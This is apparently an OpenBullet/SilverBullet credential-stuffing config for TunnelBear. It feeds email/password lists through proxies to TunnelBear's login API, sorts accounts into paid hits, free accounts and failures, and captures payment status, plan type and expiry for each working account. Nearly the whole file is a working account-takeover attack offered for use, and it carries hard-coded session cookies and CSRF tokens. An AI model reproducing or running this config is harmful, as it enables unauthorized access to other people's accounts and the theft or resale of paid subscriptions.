[SETTINGS]
{
  "Name": "TunnelBear",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2022-03-05T13:28:06.30411+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 YASHVIRGAMING#7131 🔥",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "TunnelBear",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST " https://prod-api-core.tunnelbear.com/core/web/api/login" 
  CONTENT "username=<USER>&password=<PASS>&withUserDetails=true&v=web-1.0" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: prod-api-core.tunnelbear.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "TB-CSRF-Token: f424b1eff9163693e8182bdbba3ec1ae6727a34c" 
  HEADER "X-XSRF-TOKEN: f424b1eff9163693e8182bdbba3ec1ae6727a34c" 
  HEADER "Content-Length: 80" 
  HEADER "Origin: https://www.tunnelbear.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Referer: https://www.tunnelbear.com/" 
  HEADER "Cookie: PLAY_SESSION=fdccd6e79a2b0acc1f993d47acea967ae8e4027b-___AT=f424b1eff9163693e8182bdbba3ec1ae6727a34c&tbcsrf=f424b1eff9163693e8182bdbba3ec1ae6727a34c; _gcl_au=1.1.1811726508.1645725051; _uetsid=4e4f1fa0959a11ec9c84599fef0f3eeb; _uetvid=4e4f5c10959a11eca36443c2427c40d6; _ga=GA1.2.573031323.1645725051; _gid=GA1.2.1043993445.1645725051; _clck=3qh8yn|1|ez9|0; _clsk=j8dkwc|1645725425139|13|1|j.clarity.ms/collect; _gat_UA-23359981-6=1" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "TE: trailers" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Access denied" 
    KEY "Compte suspendu pour activité malveillante potentielle" 
  KEYCHAIN Success OR 
    KEY "\"fullVersion\":\"1\"" 
  KEYCHAIN Custom "FREE" OR 
    KEY "{\"fullVersion\":\"0" 

#Status PARSE "<SOURCE>" LR "paymentStatus\":\"" "\"" CreateEmpty=FALSE -> CAP "Status" 

#Type PARSE "<SOURCE>" LR "bearType\":\"" "\"" CreateEmpty=FALSE -> CAP "Type" 

#ExpireAt PARSE "<SOURCE>" LR "fullVersionUntil\":\"" "\"" CreateEmpty=FALSE -> CAP "Expire_At" 

FUNCTION Constant "🔥 YASHVIRGAMING#7131 🔥" -> CAP "Config by" 

